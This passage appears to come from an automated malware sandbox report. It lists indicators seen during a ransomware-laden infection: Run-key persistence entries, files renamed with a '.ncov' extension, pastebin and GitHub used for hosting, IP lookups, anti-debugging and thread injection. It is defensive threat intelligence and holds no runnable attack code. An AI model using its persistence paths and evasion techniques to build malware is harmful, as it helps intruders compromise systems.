description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoronaVirus.exe = "C:\\Windows\\System32\\CoronaVirus.exe" CoronaVirus.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bwapp = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\bwapp.exe" bwapp.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\ProgramData\\explorer.exe" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysmablsvr.exe" tt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" aspnet_regiis.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" 1713315379.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysvplervcs.exe" s.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe" tdrpload.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysklnorbcv.exe" o.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\first = "C:\\Users\\Admin\\AppData\\Roaming\\first.exe" first.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 64 IoCs
description ioc Process File opened for modification C:\Users\Public\Pictures\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Documents\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Libraries\desktop.ini CoronaVirus.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-87863914-780023816-688321450-1000\desktop.ini CoronaVirus.exe File opened for modification C:\Program Files\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Searches\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Downloads\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Videos\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Music\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Desktop\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Music\desktop.ini CoronaVirus.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-87863914-780023816-688321450-1000\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI CoronaVirus.exe File opened for modification C:\Program Files (x86)\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Videos\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Links\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Documents\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini CoronaVirus.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\e: cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 135 pastebin.com 136 pastebin.com 123 raw.githubusercontent.com 124 raw.githubusercontent.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 130 ip-api.com 430 ip-api.com 1053 ip-api.com -
pid Process 10712 GameBarPresenceWriter.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\apphelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\combase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\exe\MeshService.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wkernelbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wntdll.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ws2_32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wuser32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\bcryptprimitives.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\oleaut32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\gdiplus.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\645A97B36E98BCD4272D29226E3007FBB538D950 MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wrpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wgdi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wntdll.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\BD7B7842D638B7F1216CF9F7E5124E30D7308DCC MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wgdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\Kernel.Appcore.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\B6ED760C7AC9682BD48CCDEB13A0D04341739964 MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wrpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wrpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\B6ED760C7AC9682BD48CCDEB13A0D04341739964 MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wgdi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wntdll.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wkernelbase.pdb MeshAgent.exe -
Enumerates processes with tasklist 1 TTPs 9 IoCs
pid Process 1132 tasklist.exe 5952 tasklist.exe 5576 tasklist.exe 6860 tasklist.exe 760 tasklist.exe 6000 tasklist.exe 2600 tasklist.exe 5716 tasklist.exe 3028 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
pid Process 3200 khtoawdltrha.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 11044 def.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 7048 random.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 5700 set thread context of 1736 5700 winupsecvmgr.exe 238 PID 5700 set thread context of 1984 5700 winupsecvmgr.exe 240 PID 1268 set thread context of 2816 1268 BaddStore.exe 291 PID 7068 set thread context of 2156 7068 pimer_bbbcontents7.exe 350 PID 11032 set thread context of 7508 11032 4434.exe 373 -
resource yara_rule behavioral1/files/0x002e0000000453cd-12959.dat upx behavioral1/memory/8548-12965-0x0000000000AB0000-0x0000000000D13000-memory.dmp upx behavioral1/memory/8548-13000-0x0000000000AB0000-0x0000000000D13000-memory.dmp upx behavioral1/memory/7144-13577-0x00007FF874D70000-0x00007FF875435000-memory.dmp upx behavioral1/memory/7144-13588-0x00007FF889B00000-0x00007FF889B0F000-memory.dmp upx behavioral1/memory/7144-13587-0x00007FF881170000-0x00007FF881195000-memory.dmp upx behavioral1/memory/7144-13601-0x00007FF876970000-0x00007FF876AEF000-memory.dmp upx behavioral1/memory/7144-13611-0x00007FF87EEE0000-0x00007FF87EFAD000-memory.dmp upx behavioral1/memory/7144-13610-0x00007FF875AE0000-0x00007FF876009000-memory.dmp upx behavioral1/memory/7144-13609-0x00007FF87F7E0000-0x00007FF87F813000-memory.dmp upx behavioral1/memory/7144-13608-0x00007FF887BA0000-0x00007FF887BAD000-memory.dmp upx behavioral1/memory/7144-13607-0x00007FF884F00000-0x00007FF884F19000-memory.dmp upx behavioral1/memory/7144-13600-0x00007FF87F820000-0x00007FF87F844000-memory.dmp upx behavioral1/memory/7144-13599-0x00007FF887880000-0x00007FF88789A000-memory.dmp upx behavioral1/memory/7144-13598-0x00007FF880360000-0x00007FF88038D000-memory.dmp upx behavioral1/memory/7144-13616-0x00007FF887920000-0x00007FF88792D000-memory.dmp upx behavioral1/memory/7144-13615-0x00007FF881150000-0x00007FF881164000-memory.dmp upx behavioral1/memory/7144-13618-0x00007FF874D70000-0x00007FF875435000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\fr\PresentationFramework.resources.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_Mocking.help.txt CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\fr\System.Windows.Input.Manipulations.resources.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN020.XML.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected].[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusEDUR_Subscription-ppd.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Mozilla Firefox\application.ini CoronaVirus.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-conio-l1-1-0.dll CoronaVirus.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xerces.md CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\de\PresentationUI.resources.dll CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019MSDNR_Retail-ul-oob.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\cldr.md.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Security.Cryptography.Csp.dll CoronaVirus.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.json.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\System.IO.Packaging.dll CoronaVirus.exe File opened for modification C:\Program Files\MoveExport.emf.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome.exe.sig.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019DemoR_BypassTrial180-ppd.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Threading.Overlapped.dll CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Security.Cryptography.X509Certificates.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\policy\limited\local_policy.jar CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Net.WebSockets.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png CoronaVirus.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\jaccess.jar.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-pl.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Collections.NonGeneric.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Globalization.Calendars.dll CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\cs\UIAutomationTypes.resources.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Trial-pl.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\jvm.hprof.txt.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vreg\officemuiset.msi.16.en-us.vreg.dat CoronaVirus.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\sa-jdi.jar.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Trial-ul-oob.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\StopClear.dxf.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTrial-ppd.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\7-Zip\Lang\bn.txt.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Net.WebSockets.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-100.png.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\System.Configuration.ConfigurationManager.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial-ppd.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\lv.pak.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\api-ms-win-core-sysinfo-l1-1-0.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfxswt.jar.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.IO.UnmanagedMemoryStream.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\System.Security.Permissions.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\PREVIEW.GIF.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\THMBNAIL.PNG.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Resources.Writer.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ExcelTellMeOnnxModel.bin CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja\System.Windows.Forms.Primitives.resources.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\autofill_labeling_features.txt CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Runtime.Numerics.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookVL_MAK-ppd.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity.png CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\officemuiset.msi.16.en-us.boot.tree.dat CoronaVirus.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\VisualElements\SmallLogoDev.png CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\it\System.Windows.Forms.Design.resources.dll CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pl\System.Windows.Forms.Design.resources.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\7-Zip\Lang\mk.txt CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcDemoR_BypassTrial365-ul-oob.xrm-ms CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription2-ul-oob.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe -
Drops file in Windows directory 49 IoCs
description ioc Process File opened for modification C:\Windows\sysmablsvr.exe tt.exe File opened for modification C:\Windows\SingleOxford InfluencedNervous.exe File opened for modification C:\Windows\SponsorDpi InfluencedNervous.exe File opened for modification C:\Windows\BrickFin InfluencedNervous.exe File created C:\Windows\sysnldcvmr.exe 1713315379.exe File created C:\Windows\sysklnorbcv.exe o.exe File opened for modification C:\Windows\DemonstrationCult SingerJudy.exe File opened for modification C:\Windows\CrackBride SingerJudy.exe File opened for modification C:\Windows\HeatedTimothy InfluencedNervous.exe File opened for modification C:\Windows\ChuckVoltage InfluencedNervous.exe File opened for modification C:\Windows\NtOperations InfluencedNervous.exe File opened for modification C:\Windows\ParadeMorrison ldqj18tn.exe File created C:\Windows\sysppvrdnvs.exe tdrpload.exe File opened for modification C:\Windows\AirfareGambling InfluencedNervous.exe File opened for modification C:\Windows\SeattleNuke InfluencedNervous.exe File opened for modification C:\Windows\WindowsAlberta InfluencedNervous.exe File opened for modification C:\Windows\sysnldcvmr.exe 1713315379.exe File opened for modification C:\Windows\SixCream splwow64.exe File opened for modification C:\Windows\AtlasAdvantages InfluencedNervous.exe File opened for modification C:\Windows\PlayersSite InfluencedNervous.exe File opened for modification C:\Windows\sysvplervcs.exe s.exe File opened for modification C:\Windows\BlondKatrina InfluencedNervous.exe File opened for modification C:\Windows\LuggageRepresentations splwow64.exe File opened for modification C:\Windows\HomelessLaser splwow64.exe File opened for modification C:\Windows\MatchedThem SingerJudy.exe File opened for modification C:\Windows\AdsAsp InfluencedNervous.exe File opened for modification C:\Windows\NhlPhrases InfluencedNervous.exe File opened for modification C:\Windows\DefinedDrill InfluencedNervous.exe File opened for modification C:\Windows\sysppvrdnvs.exe tdrpload.exe File opened for modification C:\Windows\sysklnorbcv.exe o.exe File opened for modification C:\Windows\FieldAnalyses InfluencedNervous.exe File opened for modification C:\Windows\AssuranceRequirements InfluencedNervous.exe File opened for modification C:\Windows\MetBlake InfluencedNervous.exe File opened for modification C:\Windows\FindingsFor InfluencedNervous.exe File opened for modification C:\Windows\OverheadSolutions InfluencedNervous.exe File opened for modification C:\Windows\NetExciting InfluencedNervous.exe File opened for modification C:\Windows\AdditionsSalvation splwow64.exe File opened for modification C:\Windows\EauOfficial splwow64.exe File opened for modification C:\Windows\ActuallyFtp splwow64.exe File created C:\Windows\sysmablsvr.exe tt.exe File opened for modification C:\Windows\BenefitBackup InfluencedNervous.exe File opened for modification C:\Windows\MeshUpdating InfluencedNervous.exe File opened for modification C:\Windows\ErikOccasionally InfluencedNervous.exe File opened for modification C:\Windows\SeasShadow InfluencedNervous.exe File opened for modification C:\Windows\TripsAstronomy ldqj18tn.exe File opened for modification C:\Windows\BibliographicHc ldqj18tn.exe File 